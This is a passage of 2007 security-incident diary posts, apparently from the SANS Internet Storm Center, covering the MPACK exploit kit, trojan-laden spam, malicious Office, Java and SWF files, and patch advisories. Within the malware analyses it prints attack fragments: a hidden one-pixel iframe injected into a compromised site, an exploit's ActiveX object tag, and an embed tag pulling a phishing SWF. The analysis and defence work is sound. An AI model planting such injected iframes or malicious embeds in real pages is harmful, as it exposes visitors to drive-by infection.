comes several different exploits (you can buy new ones to add on)
which can be used to compromise a user's system based on what they are
running.  There are different methods to get a user to access the
compromised server.  One of the more popular methods being used right
now is an IFRAME.  Websites are compromised and IFRAMES are placed on
the sites pointing to the MPACK server.

Another interesting characteristic of this tool is the fact it has a
database backend.  What this allows is the tracking of information and
report generation on all the infected systems.  Right now its being
reported by Websense that there are over 10,000 compromised systems
all with IFRAMES pointing to the MPACK server.

As a side note, keep your eye out for another tool called
DreamDownloader that is usually sold with MPACK.  DreamDownloader is
dangerous script kiddie toy.  All they have to do is tell the tool the
URL where the file is located that they want downloaded and it creates
an executable (with your choice of packers) that carries out the

For more information, check out these sites:



Published: 2007-06-16

New Hacker Challenge for you all

There is a new hacker challenge up on the ethical hacker network based on Serenity.

Matt who works with fellow handlers Ed and Mike has put this one together for us all to enjoy on, what is here a wet and cold weekend.  The challenge can be found here, enjoy.

Mark H - Shearwater


Published: 2007-06-16

Attack involving .hk domains

Eric, one of our many valued contributors wrote in yesterday with various spam messages that contained nothing but a short piece of text and a link to a very simple HK domain. Different domains were used in each message.

Subject line: Hello, Pal
Body: look


When investigating this, we noticed that these domains have no less than 10 authorative nameservers. Most interesting is that each of these appear to be located within an ISPs dynamic IP address range. This is naturally highly suspicious. Random querying for A records shows that a large number of other compromised hosts are being used to host the actual website.

On each of these servers, the index.html page contains nastiness:

  • One piece of obfuscated javascript code, that once decoded appears to exploit a known vulnerability in msdss.dll;
  • One piece of obfuscated javascript which contains iframe inclusion of three other files, exp1.htm, exp2.htm and exp3.htm and a link to an icon file 123.htm. The three HTM files attempt to exploit three vulnerabilities in Internet Explorer, the 123.htm file in fact turns out to be a malicious ANI file.
  • A final piece of human readable text that invites a user to click on a link, should the ‘download not start automatically’. Once you click on this link, a file ‘fun.exe’ will be downloaded from this same web server.

The resulting file ‘fun.exe’ appears to be different on each single server. We have currently seen the following SHA1 hashes:


Detection of the code by regular Anti-virus is very spotty, shown by the following output of Virustotal. These were the only solutions that detected malicious code. As you can see, even these are mostly generic detections:

BitDefender 7.2 06.16.2007 GenPack:Trojan.Peed.NG
CAT-QuickHeal 9.00 06.15.2007 (Suspicious) - DNAScan
DrWeb 4.33 06.16.2007 Trojan.Packed.138
eSafe 06.14.2007 Suspicious Trojan/Worm
Fortinet 06.16.2007 suspicious
F-Secure 6.70.13030.0 06.15.2007 Tibs.gen111
Kaspersky 06.16.2007 Email-Worm.Win32.Zhelatin.eu
Norman 5.80.02 06.15.2007 Tibs.gen111
Sophos 4.18.0 06.12.2007 Mal/EncPk-E
Sunbelt 2.2.907.0 06.16.2007 VIPRE.Suspicious
Webwasher-Gateway 6.0.1 06.16.2007 Worm.Win32.Malware.gen (suspicious)

This type of well-prepared and extensive attack is very difficult to shut down, mostly due to the amount of servers and authorities involved. As such, the most effective way of responding would be to have the domain itself taken down. This issue has been reported to the HKCERT as well as the administrators of the .hk TLD. In addition, we’re working with anti virus vendors to improve coverage of both the resulting file and the trojan droppers being used on the malicious site.

Maarten Van Horenbeeck


Published: 2007-06-15

safari update

Apple has released a new version of the public BETA safari browser (3.0.1) to address the three vulnerabilities announced earlier this week.
It is available here: http://www.apple.com/safari/download/

From http://lists.apple.com/archives/Security-announce/2007/Jun/msg00000.html
"CVE-ID:  CVE-2007-3186
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may lead to arbitrary code
Description:  A command injection vulnerability exists in the Windows
version of Safari 3 Public Beta.  By enticing a user to visit a
maliciously crafted web page, an attacker can trigger the issue which
may lead to arbitrary code execution.  This update addresses the
issue by performing additional processing and validation of URLs.
This does not pose a security issue on Mac OS X systems, but could
lead to an unexpected termination of the Safari browser.

CVE-ID:  CVE-2007-3185
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may lead to an unexpected
application termination or arbitrary code execution
Description:  An out-of-bounds memory read issue in Safari 3 Public
Beta for Windows may lead to an unexpected application termination or
arbitrary code execution when visiting a malicious website.  This
issue does not affect Mac OS X systems.

CVE-ID:  CVE-2007-2391
Available for:  Windows XP or Vista
Impact:  Visiting a malicious website may allow cross-site scripting
Description:  A race condition in Safari 3 Public Beta for Windows
may allow cross site scripting.  Visiting a maliciously crafted web
page may allow access to JavaScript objects or the execution of
arbitrary JavaScript in the context of another web page.  This issue
does not affect Mac OS X systems."


Published: 2007-06-15

BBB=>IRS=>FTC=>Proforma | don't open that invoice!

Several of our ever-vigilant readers have warned us of a new targeted Trojan “document” that is being sent out specifically to executives in corporations.
Thanks Dan, Andy and Joe!
Subject of the emails were of the form:

Proforma Invoice for "Company Name" (Attn: "Executive Name")

The Body of the email included this text


The Proforma Invoice is attached to this message. You can find the file
in the attachments area of your email software.

PS: The invoice also includes the cost for the services provided for the
second quarter of 2007.
Please read, evaluate and reply with any comments. Thanks."

It is another word “document” with a malicious embedded object similar to the BBB, IRS, FTC and other targeted trojan “documents” we have seen lately.

The file sent is Proforma_Invoice.doc
Those AV vendors that recognized at virustotal were:

Authentium 4.93.8 06.15.2007 W32/Dropper.ESR
Fortinet 06.15.2007 W32/Nuclear!tr
Sophos 4.18.0 06.12.2007 Troj/BHO-BP
Symantec 10 06.15.2007 Downloader
Panda 06.15.2007 Suspicious file

The document itself contains a icon of a pair of books (blue and yellow) and a magnifying glass and the text
The icon represents a “Packaged Object”.

Clicking the icon in XPsp2 resulted in a windows popup box that stated:
“The publisher could not be verified. Are you sure you want to run this software?
Publisher: Unknown Publisher
Type: Application

The three copies we have seen so far were all the same, all were 689,152 bytes long and all had a md5 hash of 47fff5b9d3765b70571454146ea9f244.

A word of caution: Do NOT open strange documents or run untrusted binaries on a machine you don’t wish to format and reinstall the OS on!
Most of us who do malware analysis have a machine that they can reinstall a fresh clean copy of the OS on if things go wrong and the ability to watch their network and see if anything is going wrong.


Published: 2007-06-14

Office of Cyber Public Health?

Joe St. Sauver, security and spam researcher at the University of
Oregon, points out that botnets are a symptom; the cause is infected
systems.  We can't clean up the bots without cleaning up the infected
systems first.

His paper for the Anti-Phishing Working Group is here

As you read it, ask yourself these questions.  If you think his proposal
wouldn't work, what would you recommend instead?  Would your proposal be
more likely to succeed?  Why?

-- Bill


Published: 2007-06-13

IRS goes FTC

After the recent BBB and the IRS scams, Sam Masiello has written in to let us know they're seeing new scam e-mails originating from the FTC. These are trying to convince you that you have filed a complaint, of which a copy is supposedly included in the attachment.

This attachment is still an RTF file with a malicious embedded object. These attacks are targeted to executives and management, so if your organization was affected by the previous ones, make sure your employees are aware of this one as well.


Published: 2007-06-13

FBI's Operation Bot Roast

Jonny wrote in pointing us to this FBI press release. In this document, the FBI provides some more information on their Operation Bot Roast, which recently hit the news stands as a result of the arrest of suspected spammer Robert Alan Soloway.
No doubt this is great news for the community. Spamming, merely one threat exacerbated by botnets, has become a huge problem, and technical means are obviously not the best way to fix it. Spam will continue to move closer in appearance to regular mail, making it difficult for us to filter it out, and making e-mail less and less usable as a means of communication. As such, government intervention to stop these practices should be applauded.
Whether these arrests will do much to relieve the increasing botnet count remains to be seen. In order to prevent these botnets from being taken over by foreign botherders, law will need to be aligned globally. In addition, the fact that these machines got infected and remained part of a botnet in the first place shows there is a problem with the ongoing security practices of their users, administrators or hosters. To relieve this threat, we as security practitioners also need to do our bit to monitor the networks under our control, understand we have a problem, and take corrective action. In combination with enforced legislation, this will move us forward.
Maarten Van Horenbeeck


Published: 2007-06-13

Investigating and responding to suspicious Office files

A major step in incident handling is to confirm whether a security incident is in fact taking place. Excessive handling of false positives can also cost an organization dearly in the long run. Recently, attacks using Office (or other office applications such as Ichitaro) as a vector have become more popular, making this identification stage a bit more difficult.

Some small tools can come in really useful if you want to avoid attaching a debugger to your Word session. Consider using your stock anti-virus. In many cases, it might be able to spot malicious files when they exploit a known vulnerability. Some names attributed to malicious Word files so far appear to generically trigger on malicious files:


Others vendors decided not to include patterns for exploitative Word documents, but provide them for their payload only, when it gets executed. While this generates less false positives, it also provides less protection for malicious code that is targeted, or has only recently been distributed. It also misses the exploit on the e-mail gateway. You may want to check in with your vendor to see what their approach to the issue is.

Another tool that is still useful is the regular hex-editor, or even strings. Seeing the MZ ‘magic’ and a stub executable, or even the UPX markers in a Word file is unusual:

dhahran:/tmp# hexdump -C malicious.doc | grep "UPX"
0103d0 55 50 58 30 00 00 00 00 00 20 12 00 00 10 00 00 |UPX0..... ......|
0103f0 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 |........UPX1....|
010420 55 50 58 32 00 00 00 00 00 10 00 00 00 60 12 00 |UPX2.........`..|
0105e0 55 50 58 21 0c 09 05 06 5c 5d 41 a8 32 6d b5 68 |UPX!....\]A.2m.h|

Other useful tools have been released by Sourcefire and SecureWorks. SourceFire’s OfficeCat scans an Office file for the exploitation of a long list of known vulnerabilities.

Sourcefire OFFICE CAT v2
* Microsoft Office File Checker *
Processing c:\office\malcode2.doc

SecureWork’s Fess, short for File Exploit Scanning System, is an open-source tool that scans files for exploits using a Snort-like inspection language. Its basic release does not contain Office sigs, but one was released a few months later on the Fess-users mailing list. It’s a powerful tool, but you may need to write signatures yourself based on what specifically you are looking for. It’s a tool that would allow you to scan Office files for shellcode, for example.

Microsoft also has tools to bring clarity into the format. In essence, Microsoft Office files are of OLE Structured Storage nature, and consist of numerous ‘storage’ and ‘stream’ items. In order to identify each of the storage items, at the end of 2006, Microsoft released a tool called STG, which can display the different structure components and their contents. This can prove valuable when you’re trying to identify malicious components. Many of you may have worked with a similar tool, DocFile viewer, part of Visual Studio.

In May of this year, Microsoft also released two tools to control the Office targeting issue. The Microsoft Office Isolated Conversion Environment converts Office 2003 documents to the Office Open XML format. This should strip out any exploits that are present and present the file ‘safely’ to recent Office versions. There are some constraints, such as macros, smart tag data and embedded documents, which cannot be converted.

The other, File Block functionality for Office allows administrators to restrict supported file types for Office through the registry and GPO. By testing and combining both applications, an organization can proactively prepare an emergency plan that can be activated should a significant threat appear.

Do you have other tools or methodology you use to deal with this threat? Get in touch!

Maarten Van Horenbeeck


Published: 2007-06-12

June 2007, Microsoft Patch Tuesday Overview.

Overview of the June 2007 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution.
Visio 2002
Visio 2003

KB 927051 No known exploits Important Critical Important
Vulnerability in Schannel Could Allow Remote Code Execution
Windows 2000
Windows XP
Windows Server 2003

KB 935840 No known exploits Critical Critical Critical
Vulnerability in Windows Vista Could Allow Information Disclosure
Windows Vista

KB 84693 No known exploits Moderate Moderate Moderate
Cumulative Security Update for Internet Explorer
Internet Explorer

KB 933566 No known exploits Critical Critical Important
Cumulative Security Update for Outlook Express and Windows Mail
Outlook Express (XP, 2003)
Windows Mail (Vista)

KB 84693 No known exploits Critical Critical Important
Vulnerability in Win32 API Could Allow Remote Code Execution
Windows 2000
Windows XP
Windows Server 2003

KB 935839 No known exploits Critical Critical Critical

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
(**)Further clarification from the more generic text above: typical clients would not use DNS or exchange servers. If they are, questions as to them being used as a client should be posed.


Published: 2007-06-12

Beta Software (Safari for Windows)

We got an unusual number of e-mails regarding the vulnerabilities in yesterday's release of Safari for Windows. I was a bit hesitant to cover it in a diary. After all, its beta software. We all know better then to use beta software in production. So operational impact of these issues should be nil.

Now... on the other hand, I own two Apple computers. So I know the power of the brushed-metal kool-aid. So lets talk about beta software in general. You got a sales guy in jeans and a black turtle neck, or a monkey running across a banner ad, telling you about the latest and greatest version of product "X". "Now with even more of must have 'Y'".

So how do you resist? I found its usually impossible. However, you can minimize the impact. Keep a "beta" machine around. Use it to install all the free trials, latest beta versions and other junk. The machine will soon become too unstable to use, making the desire for even more free-trial-super-feature-enhanced software vane quickly.

In very few cases you may want to use a beta product or a version downloaded and compiled from CVS. But these cases should be limited and strictly controlled. A couple of check points for approving a beta solution:

* Do we actually need the software?
* Is there a workaround that will make the "release" version workable?
* Is there a competing product that will do the job?
* Whats the track record of the vendor (will they always point to the next version thats just about to be released).
* How can we test if this beta software actually does what it promises?

Similar rules should be applied to any version upgraded or new software, even if its a "release". Sometimes, its better to stick with an older version for a while. At least you know how to work its bugs.

oh. and I am still typing this diary on my 3+ year old Linux system. Its the system I use to actually get work done.


Published: 2007-06-11

Internal Audits, many of us hate them, but....

They serve a valid purpose as part of a comprehensive security program. In fact quite a number of standards insist on internal audits being conducted. For example you cannot certify to ISO/IEC 27001 without an internal audit process. The internal audit can be conducted by specific groups, external parties or other staff in the section. However they often they suffer from a stigma. By some they are seen as an evil process where the nasty auditor is out to get you. This obviously doesn’t help and yes like some of you I’ve been in the situation where the auditor behaves like the smiling assassin. Smiling and agreeing, until the report comes out and your back starts to hurt.

But... I have also had the pleasure of being involved in internal audits where the main objective was to improve the overall security and the security group and the auditors work together to highlight issues that need to be addressed.

So are they useful? Why not just perform a security assessment or a penetration test? The security assessment or penetration test typically highlight some of the more obvious issues, but only an internal audit will get into the nuts and bolts of things. It is used to verify that what is written down is being done. They are more focussed and are often conducted by people who know and understand the organisation and therefore may be more aware of the subtle nuances that are present.

A good internal audit can help you identify gaps and issues with processes that have been implemented to manage security within the organisation. Those logs are they really being reviewed? Is the password reset procedure being followed? Or if in an outsourced situation, is the outsourcer really doing what the contract says they should? Are incidents handled correctly? One major benefit I’ve seen is that underlying issues are identified, another as I mentioned is that it helps highlight issues that often people have tried to raise previously. I’ve seen many an example where by a security issue was addressed only after an internal audit highlighted the problem, despite the fact that it had been raised previously by the security group. One reason may be because audit reports are often reviewed at board level whereas security issued raised may never reach that high.

So if you are being audited try and work with the auditor to get the issues you know exist addressed, possibly you may learn of some you weren’t aware of. If you are the auditor be upfront and make sure there are no surprises in the report. If you identify issues discuss them with the other party, there may be a simple explanations rather than a conspiracy to deceive.

Remember were all working towards the same goal.

Mark H. - Shearwater


Published: 2007-06-10

Malware Analysis - handling base64

I love work with information security. That’s a fact.:) I also really like to play with malware analysis, and from some time now, thats what I do for living :). And guess what I do in my free time??:) Yes, play with malware analysis too :).

I would like to share with you a situation that may occur when you are doing malware analysis.
I use pine to read some of my personal email, and last week I saved one spam that had something attached to it.
While analyzing the saved email, I saw that there was a file attached on it, that was base64 encoded.
The first sign it on the body:

Content-Type: application/octet-stream; name="badfile.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badfile.exe"
X-Attachment-Id: f_f2pdfmt5


Can you notice the:
Content-Transfer-Encoding: base64

Yes, that means that it is base64 encoded!:)

Now, how to handle it?

That’s what I want to share with you malware analysts enthusiastics today :)

As we can see with the GNU File utility, the saved-email.txt is a text file:

[lab3:~/mail# file saved-email.txt
saved-email.txt: ASCII text

I like perl, and it offers a really simple way to decode that file:

[lab3:~/mail# perl -MMIME::Base64 -e 'print decode_base64(join("", <>))' <saved-email.txt >badfile.exe.file

Now,did it work??
Easy, lets use the File utility again:

[lab3:~/mail# file badfile.exe.file
badfile.exe.file: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

Done!:) Now it is just to go ahaed an analyze the file, but thats another history...;)
Handlers on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2007-06-10

Yahoo! Messenger exploits seen in the wild

Just three days after the PoCs for 2 Yahoo! Messenger vulnerabilities have been posted (http://isc.sans.org/diary.html?storyid=2943), we’ve been informed by Roger C. from the Malware-Test Lab about a site hosting exploits for the mentioned vulnerabilities.

The exploit is referenced the standard way – an iframe points to the web site hosting the exploit (n.88tw.net). The exploit has been pretty simply obfuscated. One thing that makes it easier to identify is the object creation – for some reason attackers left it outside of the obfuscated string so it is very easy to spot:

<object classid="clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277" id='viewme'></object>

Practically the only difference from the published PoC is the objects name – in this case it is, as you can see above, “viewme”, while the object name in the originally published PoC was “target”.

The rest is very much the same, apart from the attached shellcode. The shellcode in the sample we analyzed downloaded another dropper (of course), and this second component wasn’t detected by any AV vendor on the VirusTotal site when we tested it (!!). This dropper downloaded further components, of which one was called 5in1.exe – we haven’t analyzed this yet but judging just by the file name, it doesn’t sound good.


As you are probably aware, Yahoo! provided a fix practically only couple of hours after the PoCs have been posted online (kudos to Yahoo! for this). If you are using Yahoo! Messenger you should upgrade as soon as possible. Alternatively, you can set the kill bits for the affected ActiveX controls, as we’ve posted in our original diary.

One thing that might help as well is the AV detection. Although the second stage dropper wasn’t detected by any AV vendor, the JavaScript that triggers the exploit was detected by couple of programs. As the names were generic (HEUR/Exploit.HTML, JS:Feebs-D, Heuristic.Exploit.HTML), my guess is that those that detected this properly got lucky (the Javascript used standard eval(unescape("”) method). In any case, every defense layer helps.


Published: 2007-06-08

Possible FAA computer glitches?

We are are hearing about potential FAA computer glitches on the US east coast. The FAA map shows some flight delays, but the reasons are unclear. We will update this diary as we get additional information.

Update 1: According to CBS, the FAA "experienced computer problems in departure planning early this afternoon, forcing numerous departure delays at airports nationwide. Officials said normal operations began returning between 1 p.m. and 2 p.m."

Update 2 (from Marc): According to the FAA, an FAA aeronautical database that regulates flight departures/arrivals crashed earlier today. The database consists of two systems, one in Atlanta and the other in Salt Lake City. The Atlanta system crashed at 0657 EDT and the Salt Lake City system, which runs off of Atlanta's, crashed quickly thereafter. The systems were back online by 1230 EDT and the current flight delays are a result of the air traffic catching up to the system being down for over five hours. The FAA advised that they have no preliminary information on the cause of the system crash and that it is still under investigation.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-06-08

Fake Microsoft Security Bulletin -> Malicious Browser Add-On

Dave Edwards let us know about an email message that claims to be a Microsoft Security Bulletin:
Microsoft Security Bulletin MS06-4
Cumulative Security Update for Internet Explorer (113742734)
Published: June 3, 2007
Version: 1.0


Who should read this document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately.
Of course, the proper format for the bulletin number would be "MS06-004", not "MS06-4". Second, the number of a bulletin released in 2007 would start with "MS07", not "MS06".

The scheme is what you would expect: the message includes a link to what, it claims, is a patch that is supposed to address the issue. The file, hosted on a remote server, is called "updatems06.exe". It is a UPX-packed executable that is recognized as being malicious by half of the anti-virus engines available to VirusTotal.

The executable installs a malicious browser add-on (BHO)  "down.dll" on the victim's system in C:\WINDOWS\system32. Anti-virus engines that recognize the BHO as malware identify it as Agent.avk. This seems to be a downloader that is also may be capable of spying on the user's interactions with certain sites.

Update 1:

After analyzing down.dll, Symantec Security Response let us know that the program attempts contacting 3 servers via URLs that look like:
The remote command.php script seems to assist the program in creating a local configuration file that gets saved in %System%\commands.xml. The program uses the XML file to determine how to download and execute other programs from remote locations, saving them as %System%\file.exe.

None of the 3 servers where the program attempts to download the XML file are available at the moment. I find it interesting that 2 of the servers are expected to reside in domains that have not even been registered yet. It is possible that the attacker is still in the process of setting up his or her attack network. The other server is part of a domain that has been registered for a while; however, the server is not currently accessible. Google cache suggests that when the server was up, it was being used to record user passwords, probably as part of another attack campaign.

Update 2:

Please keep in mind that Microsoft never sends out updates as attachments (Thanks, Zot!) They have a page to explain the issue:

Update 3:

Upon our request, the ISP controlling the system that was distributing updatems06.exe removed the offending file from the server.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-06-08

2 Yahoo! Messenger vulnerabilities (with PoCs)

Two brand new vulnerabilities for Yahoo! Messenger have been published on couple of security mailing lists. Both vulnerabilities are boundary errors in two ActiveX controls that come with Yahoo! Messenger: Webcam Upload (ywcupl.dll) and Webcam Viewer (ywcvwr.dll).

PoC exploits for vulnerabilities have been published as well and they allow execution of arbitrary code. Published PoCs just run Windows calculator (calc.exe), but it is trivial to change the shellcode so we can expect some attacks soon.

At the moment, the best mitigation is to set the kill bits for affected ActiveX controls: DCE2F8B1-A520-11D4-8FD0-00D0B7730277 and 9D39223E-AE8E-11D4-8FD3-00D0B7730277.

Thanks to Joshua G. and roseman for alerting us about this.

Update: Yahoo released a patched version of version of Yahoo! Messenger that addresses these vulnerabilities. For additional information and update instruction, please see http://messenger.yahoo.com/security_update.php?id=060707.


Published: 2007-06-07

DDoS on anti-spam groups

It looks like a pretty big DDoS attack is being carried out against several well known anti-spam groups, including Spamhaus, SURBL and URIBL. The Rules Emporium site that hosts additional (and very useful) rules for SpamAssassin is also not available at this moment – I don’t know if they are under a DDoS attack as well.

The attacks seem to be similar to those carried out against BlueSecurity last year, with the Storm malware. Storm is a botnet that can do basically anything and, starting from DDoS attacks to sending spam.

It looks like some anti-spam groups managed to get the attack(s) under control, let’s hope the things will stay that way.

On the other side – this looks like the anti-spam tools are doing their job because spammers seem to be desperate when they launch DDoS attacks (otherwise they would just keep sending spam, instead of using their resources this way).


Published: 2007-06-07

A Java exploit

Peter G. reported a malicious Java class that he downloaded yesterday. Now, this certainly looks interesting since this is an exploit for Java VM (not to be confused with JavaScript). This means that, in order to run the exploit, a vulnerable Java VM has to be installed on the machine.

The exploit comes in a small class file:

$ file java.class
java.class: compiled Java class data, version 46.0
$ md5sum java.class
0b67d360d5b1839820c0a39810b40498 java.class

As you probably know, Java class files contain bytecode, which is a machine language for the Java virtual machine. Luckily, bytecode has *a lot* of extra information which makes decompilation much easier (and viable, when comparing to x86 machine code, for example).

After analyzing the exploit, I found out that it’s using an old vulnerability (CVE-2007-0243) that has been patched since January. Mark also wrote about this vulnerability here. According to the CVE article, Sun JRE 5.0 Update 9 or earlier, SDK and JRE 1.4.2_12 or earlier and SDK and JRE 1.3.1_18 or earlier are all vulnerable. The vulnerability allows an applet to gain privileges through a GIF image.

This is exactly what our exploit does – it creates a malicious image that is then displayed on the victims machine. This causes a memory corruption which leads to code execution.

The sample is completely based on the publicly available PoC code that was posted to various security related mailing lists. The shellcode was, of course, changed – the current shellcode included a downloader which, of course, dropped the second stage (a password stealer).

AV detection

Now we come to an interesting point – the AV detection. I first submitted the Java class through to VirusTotal – the results were shocking – only 1 (!!!) AV program detected the Java class as malicious:
VT results (Java class)

The second stage binary was no picnic either – only a handful of AV programs detected it correctly:
VT results (2nd stage binary)
As this is a more or less standard password stealer I expect AV vendors to add detection shortly.


At this point in time I would say that I’m more worried about inability to detect the Java class properly. If you remember, back in March I wrote a diary about RTF documents carrying embedded executables (this attack scheme is still used in BBB/IRS phishing e-mails we wrote about several times). It is clear that AV programs are struggling with all these new formats – another sign that you should always rely on multiple layers of security.
Java upgrades could also be made easier: multiple available versions often confuse users (which version should I download) and the fact that old versions are left on the machine after the upgrade certainly do not help in resolving the problem.



Published: 2007-06-07

Analyzing (malicious) SWF file actions

Couple of days ago, Steve P. reported a web page that, when viewed, somehow redirected his browser to another, phishing web site. I initially thought that the original web page just used simple redirection (with or without help from JavaScript), but after analyzing the original site I found out that phishers used something different.
(I’ll use this opportunity to ask developers of legitimate web sites to try to make their code a bit more readable – stripping all spaces and tabs from your code and using cryptic names for variables doesn’t help analysts at all)
So, the web site that had the redirection had the following HTML code embedded:

<P><embed src="http://mauke.globat.com/~traderonline-ltd.com/images/a8/cocino.swf"
height="4" width="3"></P>

As you can see above, the web site (which is still live, but the target phishing site has been removed) is actually pulling an SWF (Macromedia Adobe Flash) file. In other words, the redirection was caused by the malicious SWF file, which also means that this will work only if you have Flash installed. While this was obvious, I got interested into how to analyze actions embedded in SWF files so I found two nice (and free!) utilities that you might want to bookmark, in case you need to do the same thing in the future.


The first utility is actually a collection called SWFTools (http://www.swftools.org/). This utility is for all you guys that prefer to analyze malware under Linux. The collection consists of various command line utilities for various manipulations of SWF files. The most useful one for our analysis is called swfdump. This small utility can disassemble action tags in SWF files and that’s exactly what we need in this case:

$ swfdump -a cocino.swf
[HEADER] File version: 6
[HEADER] File is zlib compressed. Ratio: 86%
[HEADER] File size: 296 (Depacked)
[HEADER] Frame rate: 12.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 10.00
[HEADER] Movie height: 10.00
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[00c] 263 DOACTION
( 259 bytes) action: GetUrl URL:"http://www.cgi5-eby.com/ws2/eBayISAPI.dll?BuyItem&i..." Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END

And the action taken is clearly visible at0x00c – the SWF file uses the GetUrl() action and redirects the browser to the target site.


The second utility that you can use to analyze this file is JSwiff (http://www.jswiff.com/). JSwiff is a Java framework for SWF file creation and manipulation. As it’s completely written in Java, you can start JSwiff on any platform.
JSwiff is a very simple GUI based utility that will immediately show all SWF headers and tags, as you can see below:




Published: 2007-06-06

Sun JRE Vulnerabilities

Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges

A buffer overflow vulnerability in the image parsing code in the Java Runtime Environment may allow an untrusted applet or application to elevate its privileges. For example, an applet may grant itself permissions to read and write local files or execute local applications that are accessible to the user running the untrusted applet.

A second vulnerability may allow an untrusted applet or application to cause the Java Virtual Machine to hang.

Both vulnerabilities can be exploited in the following versions

  • JDK and JRE 6
  • JDK and JRE 5.0 Update 10 and earlier
  • SDK and JRE 1.4.2_14 and earlier
  • SDK and JRE 1.3.1_20 and earlier

Updates are available, see the Sun alert for full details.

HOD: Christopher Carboni


Published: 2007-06-06

More PHP Phun

Jack wrote in to tell us that US-CERT posted the following advisory:

US-CERT is aware of a publicly reported vulnerability in PHP. PHP version 5.2.3 may be vulnerable to an integer overflow within the chunk_split() function.

More information can be found in the following PHP Security Blog.

US-CERT will provide additional information as it becomes available.

Thanks Jack.

HOD: Christopher Carboni


Published: 2007-06-05

Iframe > malicious javascript > trojan

Another iframe on a compromised server pointing to javascript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencode javascript at index.php then downloaded and ran hxxp:// file.php , a binary PE trojan.

Here is what virstotal had to say about file.php:

AntiVir 06.05.2007 TR/Small.MI.25
AVG 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Aditional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.



Published: 2007-06-04

Firefox and IE Zero Days

Michal Zalewski has reported several browser bugs worth alerting on

The information was posted to the Full-Disclosure mailing list and has been reported on in Computer World:

Thanks to several readers that made sure we took note.

Here is a brief summary of his report. Please refer to Full-Disclosure for more details:

1) Title : MSIE page update race condition (CRITICAL)
Impact : cookie stealing / setting, page hijacking, memory corruption
Affected : MSIE6 and MSIE7

2) Title : Firefox Cross-site IFRAME hijacking (MAJOR)
Impact : keyboard snooping, content spoofing, etc
Affected : Firefox 2.0

3) Title : Firefox file prompt delay bypass (MEDIUM)
Impact : non-consentual download or execution of files
Affected : Firefox v?.?

3) Title : MSIE6 URL bar spoofing (MEDIUM)
Impact : mimicking an arbitrary site, possibly including SSL data
Affected : MSIE6



Published: 2007-06-04

New Malware SPAM

One of our readers (thanks Michael) reported receiving a passoword protected zip file as SPAM with the password included in the HTML body of the email.

The SPAM From: line may show a news organization. However the actual sources of the email is all over the map. Hopefully most people have been trained to not trust the From: line or reply to spammy looking emails by now.

Sample Subject Lines:
Subject: Re: U.S. violent crime up again, more murders, robberies
Subject: Man Awakens From 19-Year Coma
Subject: Law hits Las Vegas &apos;fake&apos; bands

Several of the samples included body text such as:

Decade Of Mystery: John Ramsey Speaks
Man wakes from 19-year coma in
Poland US vows to pursue hunt for missing soldiers
 Password for submitted attachment is xxx

